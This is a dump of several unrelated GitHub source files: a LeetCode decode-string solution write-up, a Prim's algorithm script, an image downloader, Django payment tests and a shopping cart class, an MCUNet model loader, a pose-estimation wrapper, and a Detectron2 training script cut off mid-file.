stk[:len(stk)-1]\n }\n for i := 0; i < len(sub)/2; i++ {\n sub[i], sub[len(sub)-i-1] = sub[len(sub)-i-1], sub[i]\n }\n stk = stk[:len(stk)-1]\n repTime, _ := strconv.Atoi(stk[len(stk)-1])\n stk = stk[:len(stk)-1]\n t := strings.Repeat(getString(sub), repTime)\n stk = append(stk, t)\n }\n }\n return getString(stk)\n}\n\nfunc getDigits(s string, ptr *int) string {\n ret := \"\"\n for ; s[*ptr] >= '0' && s[*ptr] <= '9'; *ptr++ {\n ret += string(s[*ptr])\n }\n return ret\n}\n\nfunc getString(v []string) string {\n ret := \"\"\n for _, s := range v {\n ret += s\n }\n return ret\n}\n复杂度分析\n\n时间复杂度:记解码后得出的字符串长度为 SS,除了遍历一次原字符串 ss,我们还需要将解码后的字符串中的每个字符都入栈,并最终拼接进答案中,故渐进时间复杂度��� O(S+|s|)O(S+∣s∣),即 O(S)O(S)。\n空间复杂度:记解码后得出的字符串长度为 SS,这里用栈维护 TOKEN,栈的总大小最终与 SS 相同,故渐进空间复杂度为 O(S)O(S)。\n方法二:递归\n思路和算法\n\n我们也可以用递归来解决这个问题,从左向右解析字符串:\n\n如果当前位置为数字位,那么后面一定包含一个用方括号表示的字符串,即属于这种情况:k[...]:\n我们可以先解析出一个数字,然后解析到了左括号,递归向下解析后面的内容,遇到对应的右括号就返回,此时我们可以根据解析出的数字 xx 解析出的括号里的字符串 s's \n′\n 构造出一个新的字符串 x \\times s'x×s \n′\n ;\n我们把 k[...] 解析结束后,再次调用递归函数,解析右括号右边的内容。\n如果当前位置是字母位,那么我们直接解析当前这个字母,然后递归向下解析这个字母后面的内容。\n如果觉得这里讲的比较抽象,可以结合代码理解一下这个过程。\n\n下面我们可以来讲讲这样做的依据,涉及到《编译原理》相关内容,感兴趣的同学可以参考阅读。 根据题目的定义,我们可以推导出这样的巴科斯范式(BNF):\n\n\\begin{aligned} {\\rm String} &\\rightarrow { \\rm Digits \\, [String] \\, String \\, | \\, Alpha \\, String \\, | \\, \\epsilon } \\\\ {\\rm Digits} &\\rightarrow { \\rm Digit \\, Digits \\, | \\, Digit } \\\\ {\\rm Alpha} &\\rightarrow { a | \\cdots | z | A | \\cdots | Z } \\\\ {\\rm Digit} &\\rightarrow { 0 | \\cdots | 9 } \\\\ \\end{aligned}\nString\nDigits\nAlpha\nDigit\n​\t\n \n→Digits[String]String∣AlphaString∣ϵ\n→DigitDigits∣Digit\n→a∣⋯∣z∣A∣⋯∣Z\n→0∣⋯∣9\n​\t\n \n\n\\rm DigitDigit 表示十进制数位,可能的取值是 00 到 99 之间的整数\n\\rm AlphaAlpha 表示字母,可能的取值是大小写字母的集合,共 5252 个\n\\rm DigitDigit 表示一个整数,它的组成是 \\rm DigitDigit 出现一次或多次\n\\rm StringString 代表一个代解析的字符串,它可能有三种构成,如 BNF 所示\n\\rm \\epsilonϵ 表示空串,即没有任何子字符\n由于 \\rm DigitsDigits 和 \\rm AlphaAlpha 构成简单,很容易进行词法分析,我们把它他们看作独立的 TOKEN。那么此时的非终结符有 \\rm StringString,终结符有 \\rm DigitsDigits、\\rm AlphaAlpha 和 \\rm \\epsilonϵ,我们可以根据非终结符和 FOLLOW 集构造出这样的预测分析表:\n\n\\rm AlphaAlpha\t\\rm DigitsDigits\t\\rm \\epsilonϵ\n\\rm StringString\t\\rm String \\rightarrow Alpha \\, StringString→AlphaString\t\\rm String \\rightarrow Digits \\, [String] \\, StringString→Digits[String]String\t\\rm String \\rightarrow \\epsilonString→ϵ\n可见不含多重定义的项,为 LL(1) 文法,即:\n\n从左向右分析(Left-to-right-parse)\n最左推导(Leftmost-derivation)\n超前查看一个符号(1-symbol lookahead)\n它决定了我们从左向右遍历这个字符串,每次只判断当前最左边的一个字符的分析方法是正确的。\n\n代码如下。\n\nC++JavaGolang\nvar (\n src string\n ptr int\n)\n\nfunc decodeString(s string) string {\n src = s\n ptr = 0\n return getString()\n}\n\nfunc getString() string {\n if ptr == len(src) || src[ptr] == ']' {\n return \"\"\n }\n cur := src[ptr]\n repTime := 1\n ret := \"\"\n if cur >= '0' && cur <= '9' {\n repTime = getDigits()\n ptr++\n str := getString()\n ptr++\n ret = strings.Repeat(str, repTime)\n } else if cur >= 'a' && cur <= 'z' || cur >= 'A' && cur <= 'Z' {\n ret = string(cur)\n ptr++\n }\n return ret + getString()\n}\n\nfunc getDigits() int {\n ret := 0\n for ; src[ptr] >= '0' && src[ptr] <= '9'; ptr++ {\n ret = ret * 10 + int(src[ptr] - '0')\n }\n return ret\n}\n复杂度分析\n\n时间复杂度:记解码后得出的字符串长度为 SS,除了遍历一次原字符串 ss,我们还需要将解码后的字符串中的每个字符都拼接进答案中,故渐进时间复杂度为 O(S+|s|)O(S+∣s∣),即 O(S)O(S)。\n空间复杂度:若不考虑答案所占用的空间,那么就只剩递归使用栈空间的大小,这里栈空间的使用和递归树的深度成正比,最坏情况下为 O(|s|)O(∣s∣),故渐进空间复杂度为 O(|s|)O(∣s∣)。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/decode-string/solution/zi-fu-chuan-jie-ma-by-leetcode-solution/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/stack/leetcode-394-DecodeString.py","file_name":"leetcode-394-DecodeString.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24482002431","text":"#task_3\ndef alg_prima(graph):\n\tin_processing = {(0, u) for u in graph[0]}\n\tin_tree = {0}\n\tedge_list = []\n\twhile True:\n\t\tmin_v = float('+inf')\n\t\tmin_e = None\n\t\tfor e in list(in_processing):\n\t\t\ts, t = e\n\t\t\tif t in in_tree:\n\t\t\t\tin_processing.remove(e)\n\t\t\t\tcontinue\n\t\t\tif graph[s][t] < min_v:\n\t\t\t\tmin_v = graph[s][t]\n\t\t\t\tmin_e = e\n\t\tif min_e is None:\n\t\t\tbreak\n\t\tedge_list.append(min_e)\n\t\tin_processing.update({(min_e[1], v) for v in graph[min_e[1]] if v not in in_tree})\n\t\tin_tree.add(min_e[1])\n\treturn edge_list\n\nn, m = tuple(map(int, input().split()))\ngraph = {i: {} for i in range(n)}\nfor j in range(m):\n\ta, b, w = tuple(map(int, input().split()))\n\tgraph[a][b] = w\n\tgraph[b][a] = w\nedge_list = alg_prima(graph)\nw = sum(graph[a][b] for a, b in edge_list)\nprint(w)\nfor i in range(len(edge_list)):\n\tprint(*edge_list[i])\n","repo_name":"Senbjorn/mipt_lab_2016","sub_path":"lab_21/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"716441459","text":"from bs4 import BeautifulSoup\nimport os\nimport asyncio\nfrom aiohttp import ClientSession\n\n\nmain_url = \"https://earthview.withgoogle.com/\"\nloop = asyncio.get_event_loop()\nlock = asyncio.Lock()\ncheckCount = 0\n\n\nasync def DownloadImage(url: str, Count: int):\n async with ClientSession() as session:\n async with session.get(url) as resp:\n with open(f\"{Count}.png\", \"wb\") as file:\n file.write(await resp.read())\n print(f\"write image {Count}\")\n\n\nasync def makeRequest(Count: int):\n global checkCount\n async with ClientSession() as session:\n async with session.get(f\"{main_url}/{Count}\") as resp:\n if not resp.status == 200:\n return\n\n async with lock:\n checkCount += 1\n\n print(f\"Found: {Count}\")\n ImageElement = BeautifulSoup(await resp.text(), \"html.parser\").find(class_=\"photo-view--active\")\n await DownloadImage(ImageElement[\"src\"], Count)\n\n\nasync def main():\n global checkCount\n print(\"earthview with google batch downloader\")\n \n starts = int(input(\"starts at: \"))\n stops = int(input(\"stops at: \"))\n\n try:\n os.mkdir(\"images\")\n except:\n print('folder \"images\" already exists')\n finally:\n os.chdir(\"images\")\n\n await asyncio.gather(*[makeRequest(count) for count in range(starts, stops+1)])\n print(f\"{checkCount}/{stops - starts} check\")\n loop.stop()\n\n\nif __name__ == \"__main__\":\n loop.create_task(main())\n loop.run_forever()\n","repo_name":"Ozkanozsm/earthviewpuller","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33797182000","text":"try:\n from django.utils import unittest\nexcept ImportError:\n import unittest\nfrom django.test.client import Client\nfrom django.conf import settings\n\nclass PagSeguroRetornoViewTest(unittest.TestCase):\n def test_view_retorno_com_get(self):\n c = Client()\n res = c.get(settings.PAGSEGURO_URL_RETORNO)\n self.assertEquals(res.status_code, 302)\n url_final_valida = res['location'].endswith(settings.PAGSEGURO_URL_FINAL)\n self.assertTrue(url_final_valida)\n\n def test_view_retorno_post_ok(self):\n from django_pagseguro import pagseguro\n def mock_req_pagseguro(params):\n return 'VERIFICADO'\n pagseguro._req_pagseguro = mock_req_pagseguro\n c = Client()\n dados = {'StatusTransacao':'Aprovado', 'Referencia':42}\n res = c.post(settings.PAGSEGURO_URL_RETORNO, dados)\n self.assertEquals(res.content, 'OK')\n\n def test_retorno_post_falha(self):\n from django_pagseguro import pagseguro\n def mock_req_pagseguro(params):\n return 'FALSO'\n pagseguro._req_pagseguro = mock_req_pagseguro\n c = Client()\n dados = {'StatusTransacao':'Aprovado', 'Referencia':42}\n res = c.post(settings.PAGSEGURO_URL_RETORNO, dados)\n self.assertEquals(res.content, 'FALHA')\n","repo_name":"fabiocerqueira/django-pagseguro","sub_path":"django_pagseguro/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"pt","doc_type":"code","stars":61,"dataset":"github-code","pt":"21"} +{"seq_id":"16314430752","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 26 23:29:33 2018\r\n\r\n@author: Raghul\r\n\"\"\"\r\n\r\nprint(\">>FLAMES<<\")\r\n\r\na = input(\"Your Name: \")\r\nb = input(\"Your Crush: \")\r\n\r\nrelation = {'f':a + \" and \" + b + \" are friends.\",\\\r\n 'l':a + \" and \" + b + \" are in love.\",\\\r\n 'a':b + \" have affection on \" + a + \".\",\\\r\n 'm':b+\" will marry \"+a+\".\",\\\r\n 'e':b+\" is an enemy of \"+a+\".\",\\\r\n 's':b+\" is a sister of \"+a+\".\"}\r\n\r\na = list(a.lower().replace(\" \",\"\"))\r\nb = list(b.lower().replace(\" \",\"\"))\r\n\r\nresult = list(\"flames\")\r\n\r\ncount = 0\r\n\r\nfor i in range(len(b)):\r\n if b[i] in a:\r\n a[a.index(b[i])] = '*'\r\n b[i] = '-'\r\n count += 1\r\n\r\nrun = len(a) + len(b) - 2*count\r\n\r\nnewindex = 0\r\n\r\nfor i in range(6,1,-1):\r\n index = (newindex+run-1)%i\r\n result.remove(result[index])\r\n newindex = index%i\r\n\r\nprint(relation[result[0]])\r\n","repo_name":"lugar004/flames","sub_path":"flames.py","file_name":"flames.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40403246171","text":"from decimal import Decimal\n\nfrom store.models import Product\n\n\nclass Cart():\n \n def __init__(self, request):\n\n self.session = request.session\n \n cart = self.session.get('session_key')\n\n if 'session_key' not in request.session:\n\n cart = self.session['session_key'] = {}\n\n self.cart = cart\n\n\n # هذه للتحقق مما اذا تم التعديل علي الاد ام لا \n # اذا كان اامنتج موجود في السلة يقوم بتحديث الكمية\n # واذا كان غير موجود يتم انشاء سلة جديدة بالمنتج وسعره وكميته\n # ثم يتحقق من انه تم التعديل\n\n# -------------------------------\n\n def add(self, product, product_qty):\n \n # تحويل رقم المنتج اللي قيمة نصية\n product_id = str(product.id)\n\n # يتم التحقق هنا مما إذا كان product_id موجودًا بالفعل في سلة التسوق (self.cart) أم لا.\n # وسلة التسوق اتت بالمنتج من الفيو\n if product_id in self.cart:\n \n # سيتم تحديث الكمية الموجودة بالكمية المجلوبة من الفيو\n # qty هوا بمثابة متغير للكمية\n # واذا اضاف كمية اخري سيتم تحديث الكمية بدون عمل سلة جديدة\n self.cart[product_id]['qty'] = product_qty\n\n else:\n \n # سيتم انشاء مدخل جديد في سلة التسوق واضافة المنتج بسعره وكميته\n self.cart[product_id] = {'price': str(product.price), 'qty': product_qty}\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n\n\n\n # -------------------------------\n\n def delete(self,product):\n \n # جلب المنتج الذي سيحذف من الفيو\n product_id = str(product)\n\n # لو هوا موجود في الكارت\n if product_id in self.cart:\n\n # قم بحذفه\n del self.cart[product_id]\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n \n\n# --------------------------------------\n\n\n def update(self, product, qty):\n\n # جلب المنتج الذي سيحذف من الفيو\n product_id = str(product)\n\n # جلب الكمية التي اخترتها في هذا المنتج\n product_quantity = qty\n\n # لو هوا موجود في الكارت\n if product_id in self.cart:\n\n # قم بتحديث الكمية الي الكمية المحدثة\n self.cart[product_id]['qty'] = product_quantity\n\n # اذا تم التعديل علي الكود \n self.session.modified = True\n\n\n# -------------------------------------\n # هذه دالة لارجاع مجموع الكميات الموجودة في سلة التسوق\n def __len__(self):\n #باستخدام سم وياتي بهم جميعا من الكارت qty هذا يقوم بجمع القيم من \n return sum(item['qty'] for item in self.cart.values())\n \n\n# ----------------------------------------\n\n def __iter__(self):\n\n # لجلب جميع مفاتيح المنتجات الموجودة في سلة التسوق\n all_product_ids = self.cart.keys()\n\n # استرداد جميع المنتجات اللتي تحمل المفاتيح السابقة \n products = Product.objects.filter(id__in=all_product_ids)\n \n # يتم نسخ محتوي سلة التسوق الي مصفوفة\n cart = self.cart.copy()\n\n # لعمل تكرار بالمنتجات المفلترة اللتي اتينا بها\n for product in products:\n \n # لعمل مفتاح بالاسم لاستخدامه لاحقا في العرض وهو به المنتجات\n cart[str(product.id)]['product'] = product\n\n # لكل عنصر في مجموعة كرات فعل الامور التالية\n for item in cart.values():\n\n # لتحويل كل عنصر اتينا به الي رقم حسابي وهذا للتعامل معه جيدا في العمليات الرياضية\n item['price'] = Decimal(item['price'])\n\n # total ضرب قيمة السعر الاجمالي في كل عنصر في الكمية وهذا ياتي بالسعر الكلي داخل المتغير \n item['total'] = item['price'] * item['qty']\n\n # لاعادة العنصر الحالي من سلة التسوق بشكل تدريجي وهذا لتوفير الذاكرة والاداء\n yield item\n\n\n # -----------------------------------\n\n def get_total(self):\n \n # لجلب الاسعار وضربها في الكمية للحصول علي السعر الكلي لجميع المنتجات بكمياتهم\n return sum(Decimal(item['price']) * item['qty'] for item in self.cart.values())","repo_name":"AhmedRagep/E-Commerce-Advanced-Django","sub_path":"cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34475583687","text":"import json\nimport torch\n\nfrom .tinynas.nn.networks import ProxylessNASNets\nfrom .utils import download_url\n\n__all__ = ['net_id_list', 'build_model', 'download_tflite']\n\n\"\"\" Note: all the memory and latency profiling is done with TinyEngine \"\"\"\nNET_INFO = {\n ##### imagenet models ######\n # mcunet models\n 'mcunet-in0': {\n 'net_name': 'mcunet-10fps_imagenet',\n 'description': 'MCUNet model that runs 10fps on STM32F746 (ImageNet)'\n },\n 'mcunet-in1': {\n 'net_name': 'mcunet-5fps_imagenet',\n 'description': 'MCUNet model that runs 5fps on STM32F746 (ImageNet)'\n },\n 'mcunet-in2': {\n 'net_name': 'mcunet-256kb-1mb_imagenet',\n 'description': 'MCUNet model that fits 256KB SRAM and 1MB Flash (ImageNet)',\n },\n 'mcunet-in3': {\n 'net_name': 'mcunet-320kb-1mb_imagenet',\n 'description': 'MCUNet model that fits 320KB SRAM and 1MB Flash (ImageNet)',\n },\n 'mcunet-in4': {\n 'net_name': 'mcunet-512kb-2mb_imagenet',\n 'description': 'MCUNet model that fits 512KB SRAM and 2MB Flash (ImageNet)',\n },\n # baseline models\n 'mbv2-w0.35': {\n 'net_name': 'mbv2-w0.35-r144_imagenet',\n 'description': 'scaled MobileNetV2 that fits 320KB SRAM and 1MB Flash (ImageNet)',\n },\n 'proxyless-w0.3': {\n 'net_name': 'proxyless-w0.3-r176_imagenet',\n 'description': 'scaled ProxylessNet that fits 320KB SRAM and 1MB Flash (ImageNet)'\n },\n\n ##### vww models ######\n 'mcunet-vww0': {\n 'net_name': 'mcunet-10fps_vww',\n 'description': 'MCUNet model that runs 10fps on STM32F746 (VWW)'\n },\n 'mcunet-vww1': {\n 'net_name': 'mcunet-5fps_vww',\n 'description': 'MCUNet model that runs 5fps on STM32F746 (VWW)'\n },\n 'mcunet-vww2': {\n 'net_name': 'mcunet-320kb-1mb_vww',\n 'description': 'MCUNet model that fits 320KB SRAM and 1MB Flash (VWW)'\n },\n\n ##### detection demo model ######\n # NOTE: we have tf-lite only for this model\n 'person-det': {\n 'net_name': 'person-det',\n 'description': 'person detection model used in our demo'\n },\n}\n\nnet_id_list = list(NET_INFO.keys())\n\nurl_base = \"https://hanlab18.mit.edu/projects/tinyml/mcunet/release/\"\n\n\ndef build_model(net_id, pretrained=True):\n assert net_id in NET_INFO, 'Invalid net_id! Select one from {})'.format(list(NET_INFO.keys()))\n net_info = NET_INFO[net_id]\n\n net_config_url = url_base + net_info['net_name'] + \".json\"\n sd_url = url_base + net_info['net_name'] + \".pth\"\n\n net_config = json.load(open(download_url(net_config_url)))\n resolution = net_config['resolution']\n model = ProxylessNASNets.build_from_config(net_config)\n\n if pretrained:\n sd = torch.load(download_url(sd_url), map_location='cpu')\n model.load_state_dict(sd['state_dict'])\n return model, resolution, net_info['description']\n\n\ndef download_tflite(net_id):\n assert net_id in NET_INFO, 'Invalid net_id! Select one from {})'.format(list(NET_INFO.keys()))\n net_info = NET_INFO[net_id]\n tflite_url = url_base + net_info['net_name'] + \".tflite\"\n return download_url(tflite_url) # the file path of the downloaded tflite model\n","repo_name":"mit-han-lab/mcunet","sub_path":"mcunet/model_zoo.py","file_name":"model_zoo.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":330,"dataset":"github-code","pt":"21"} +{"seq_id":"21746613982","text":"from typing import List, Tuple\n\nfrom petools.tools.estimate_tools import Human\n\n\nclass OpWrapper:\n \"\"\"\n This object performs a given Op on input humans. Each human will be provided with an individual Op instance.\n When instantiating an Op for a given human, it is being bind to the human's id (and saved to an internal register\n of ops) so that the Op instance can be reused when a human with the same id is encountered.\n \"\"\"\n def __init__(self, op_init_fn):\n \"\"\"\n Parameters\n ----------\n op_init_fn : func\n Function that create class which apply some operation on list of Human classes\n Class must have method with next signature:\n def __call__(self, human: Human) -> Human:\n pass\n Class must return list of modified (or whatever) list of Human classes\n\n \"\"\"\n self.op_init_fn = op_init_fn\n self.register = {}\n\n def __call__(self, humans: List[Human], **op_kwargs) -> List[Tuple[Human, object]]:\n \"\"\"\n Returns results of the given Op applied to `humans`.\n\n Parameters\n ----------\n humans : List[Human]\n List of humans to be processed.\n op_kwargs : dict\n Supplement key-word arguments for the Op instances.\n\n Returns\n -------\n List[Tuple[Human, object]]\n A list of tuples (Human, operation result).\n \"\"\"\n op_results = []\n for human in humans:\n if human.id == -1:\n # An exceptional case which is not being processed by the OpWrapper.\n # Humans with id=-1 are assumed to be erroneous.\n op_results.append((human, None))\n continue\n op = self.register.get(str(human.id))\n if op is None:\n # Human with a new id has been encountered. Create a new instance of the Op\n op = self.op_init_fn()\n self.register[str(human.id)] = op\n op_result = op(human, **op_kwargs)\n op_results.append((human, op_result))\n return op_results\n","repo_name":"MakiResearchTeam/PETools","sub_path":"petools/model_tools/operation_wrapper/op_wrapper.py","file_name":"op_wrapper.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7781957799","text":"#引入以下注释\nfrom detectron2.data import DatasetCatalog, MetadataCatalog\nfrom detectron2.data.datasets.coco import load_coco_json\nimport pycocotools\nimport os\nimport logging\nimport os\nfrom collections import OrderedDict\nimport torch\nimport cv2\nimport detectron2.utils.comm as comm\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.utils.visualizer import Visualizer\nfrom detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch\nfrom detectron2.evaluation import (\n CityscapesInstanceEvaluator,\n CityscapesSemSegEvaluator,\n COCOEvaluator,\n COCOPanopticEvaluator,\n DatasetEvaluators,\n LVISEvaluator,\n PascalVOCDetectionEvaluator,\n SemSegEvaluator,\n verify_results,\n)\nfrom detectron2.modeling import GeneralizedRCNNWithTTA\n\n#声明类别,尽量保持\nCLASS_NAMES =[\"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\",\n \"cow\", \"diningtable\", \"dog\", \"horse\",\n \"motorbike\", \"person\", \"pottedplant\",\n \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n# 数据集路径\nDATASET_ROOT = 'D:/mycode/py-workspace/DL/detectron2/detectron2/data/datasets/coco_data'\nANN_ROOT = os.path.join(DATASET_ROOT, 'annotations')\n\nTRAIN_PATH = os.path.join(DATASET_ROOT, 'train2017')\nVAL_PATH = os.path.join(DATASET_ROOT, 'val2017')\n\nTRAIN_JSON = os.path.join(ANN_ROOT, 'instances_train2017.json')\n#VAL_JSON = os.path.join(ANN_ROOT, 'val.json')\nVAL_JSON = os.path.join(ANN_ROOT, 'instances_val2017.json')\n\n# 声明数据集的子集\nPREDEFINED_SPLITS_DATASET = {\n \"coco_2017_train\": (TRAIN_PATH, TRAIN_JSON),\n \"coco_2017_val\": (VAL_PATH, VAL_JSON),\n}\n#===========以下有两种注册数据集的方法,本人直接用的第二个plain_register_dataset的方式 也可以用register_dataset的形式==================\n#注册数据集(这一步就是将自定义数据集注册进Detectron2)\ndef register_dataset():\n \"\"\"\n purpose: register all splits of dataset with PREDEFINED_SPLITS_DATASET\n \"\"\"\n for key, (image_root, json_file) in PREDEFINED_SPLITS_DATASET.items():\n register_dataset_instances(name=key,\n json_file=json_file,\n image_root=image_root)\n\n\n#注册数据集实例,加载数据集中的对象实例\ndef register_dataset_instances(name, json_file, image_root):\n \"\"\"\n purpose: register dataset to DatasetCatalog,\n register metadata to MetadataCatalog and set attribute\n \"\"\"\n DatasetCatalog.register(name, lambda: load_coco_json(json_file, image_root, name))\n MetadataCatalog.get(name).set(json_file=json_file,\n image_root=image_root,\n evaluator_type=\"coco\")\n\n#=============================\n# 注册数据集和元数据\ndef plain_register_dataset():\n #训练集\n DatasetCatalog.register(\"coco_2017_train\", lambda: load_coco_json(TRAIN_JSON, TRAIN_PATH))\n MetadataCatalog.get(\"coco_2017_train\").set(thing_classes=CLASS_NAMES, # 可以选择开启,但是不能显示中文,这里需要注意,中文的话最好关闭\n evaluator_type='coco', # 指定评估方式\n json_file=TRAIN_JSON,\n image_root=TRAIN_PATH)\n\n #DatasetCatalog.register(\"coco_my_val\", lambda: load_coco_json(VAL_JSON, VAL_PATH, \"coco_2017_val\"))\n #验证/测试集\n DatasetCatalog.register(\"coco_2017_val\", lambda: load_coco_json(VAL_JSON, VAL_PATH))\n MetadataCatalog.get(\"coco_2017_val\").set(thing_classes=CLASS_NAMES, # 可以选择开启,但是不能显示中文,这里需要注意,中文的话最好关闭\n evaluator_type='coco', # 指定评估方式\n json_file=VAL_JSON,\n image_root=VAL_PATH)\n# 查看数据集标注,可视化检查数据集标注是否正确,\n#这个也可以自己写脚本判断,其实就是判断标注框是否超越图像边界\n#可选择使用此方法\ndef checkout_dataset_annotation(name=\"coco_2017_val\"):\n #dataset_dicts = load_coco_json(TRAIN_JSON, TRAIN_PATH, name)\n dataset_dicts = load_coco_json(TRAIN_JSON, TRAIN_PATH)\n print(len(dataset_dicts))\n for i, d in enumerate(dataset_dicts,0):\n #print(d)\n img = cv2.imread(d[\"file_name\"])\n visualizer = Visualizer(img[:, :, ::-1], metadata=MetadataCatalog.get(name), scale=1.5)\n vis = visualizer.draw_dataset_dict(d)\n #cv2.imshow('show', vis.get_image()[:, :, ::-1])\n cv2.imwrite('out/'+str(i) + '.jpg',vis.get_image()[:, :, ::-1])\n #cv2.waitKey(0)\n if i == 200:\n break\n\n\nclass Trainer(DefaultTrainer):\n \"\"\"\n We use the \"DefaultTrainer\" which contains pre-defined default logic for\n standard training workflow. They may not work for you, especially if you\n are working on a new research project. In that case you can write your\n own training loop. You can use \"tools/plain_train_net.py\" as an example.\n \"\"\"\n\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n \"\"\"\n Create evaluator(s) for a given dataset.\n This uses the special metadata \"evaluator_type\" associated with each builtin dataset.\n For your own dataset, you can simply create an evaluator manually in your\n script and do not have to worry about the hacky if-else logic here.\n \"\"\"\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n evaluator_list = []\n evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type\n if evaluator_type in [\"sem_seg\", \"coco_panoptic_seg\"]:\n evaluator_list.append(\n SemSegEvaluator(\n dataset_name,\n distributed=True,\n num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,\n output_dir=output_folder,\n )\n )\n if evaluator_type in [\"coco\", \"coco_panoptic_seg\"]:\n evaluator_list.append(COCOEvaluator(dataset_name, cfg, True, output_folder))\n if evaluator_type == \"coco_panoptic_seg\":\n evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder))\n if evaluator_type == \"cityscapes_instance\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesInstanceEvaluator(dataset_name)\n if evaluator_type == \"cityscapes_sem_seg\":\n assert (\n torch.cuda.device_count() >= comm.get_rank()\n ), \"CityscapesEvaluator currently do not work with multiple machines.\"\n return CityscapesSemSegEvaluator(dataset_name)\n elif evaluator_type == \"pascal_voc\":\n return PascalVOCDetectionEvaluator(dataset_name)\n elif evaluator_type == \"lvis\":\n return LVISEvaluator(dataset_name, cfg, True, output_folder)\n if len(evaluator_list) == 0:\n raise NotImplementedError(\n \"no Evaluator for the dataset {} with the type {}\".format(\n dataset_name, evaluator_type\n )\n )\n elif len(evaluator_list) == 1:\n return evaluator_list[0]\n return DatasetEvaluators(evaluator_list)\n\n @classmethod\n def test_with_TTA(cls, cfg, model):\n logger = logging.getLogger(\"detectron2.trainer\")\n # In the end of training, run an evaluation with TTA\n # Only support some R-CNN models.\n logger.info(\"Running inference with test-time augmentation ...\")\n model = GeneralizedRCNNWithTTA(cfg, model)\n evaluators = [\n cls.build_evaluator(\n cfg, name, output_folder=os.path.join(cfg.OUTPUT_DIR, \"inference_TTA\")\n )\n for name in cfg.DATASETS.TEST\n ]\n res = cls.test(cfg, model, evaluators)\n res = OrderedDict({k + \"_TTA\": v for k, v in res.items()})\n return res\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n args.config_file = \"../configs/Misc/cascade_mask_rcnn_R_50_FPN_3x.yaml\"\n cfg.merge_from_file(args.config_file) # 从config file 覆盖配置\n cfg.merge_from_list(args.opts) # 从CLI参数 覆盖配置\n\n # 更改配置参数\n cfg.DATASETS.TRAIN = (\"coco_2017_train\",) # 训练数据集名称\n cfg.DATASETS.TEST = (\"coco_2017_val\",)\n cfg.DATALOADER.NUM_WORKERS = 2 # 单线程\n\n '''\n cfg.INPUT.CROP.ENABLED = True\n cfg.INPUT.MAX_SIZE_TRAIN = 640 # 训练图片输入的最大尺寸\n cfg.INPUT.MAX_SIZE_TEST = 640 # 测试数据输入的最大尺寸\n cfg.INPUT.MIN_SIZE_TRAIN = (512, 768) # 训练图片输入的最小尺寸,可以设定为多尺度训练\n cfg.INPUT.MIN_SIZE_TEST = 640\n #cfg.INPUT.MIN_SIZE_TRAIN_SAMPLING,其存在两种配置,分别为 choice 与 range :\n # range 让图像的短边从 512-768随机选择\n #choice : 把输入图像转化为指定的,有限的几种图片大小进行训练,即短边只能为 512或者768\n cfg.INPUT.MIN_SIZE_TRAIN_SAMPLING = 'range'\n '''\n# 本句一定要看下注释!!!!!!!!\n # cfg.MODEL.RETINANET.NUM_CLASSES = 21 # 类别数+1(因为有background,也就是你的 cate id 从 1 开始,如果您的数据集Json下标从 0 开始,这个改为您对应的类别就行,不用再加背景类!!!!!)\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 20\n #cfg.MODEL.WEIGHTS=\"/home/yourstorePath/.pth\"\n cfg.MODEL.WEIGHTS = \"../model_final_480dd8.pkl\" # 预训练模型权重\n #cfg.MODEL.WEIGHTS = \"output/model_0002248.pth\" #测试时使用的模型,看自己训练结果的outputs\n cfg.SOLVER.IMS_PER_BATCH = 1 # batch_size=2; iters_in_one_epoch = dataset_imgs/batch_size\n\n cfg.SOLVER.BASE_LR = 0.002\n cfg.SOLVER.MAX_ITER = (\n 1000\n )\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = (\n 1\n )\n\n\n\n # 根据训练数据总数目以及batch_size,计算出每个epoch需要的迭代次数\n #9000为你的训练数据的总数目,可自定义\n ITERS_IN_ONE_EPOCH = int(5717 / cfg.SOLVER.IMS_PER_BATCH)\n\n '''\n # 指定最大迭代次数\n cfg.SOLVER.MAX_ITER = (ITERS_IN_ONE_EPOCH * 12) - 1 # 12 epochs,\n # 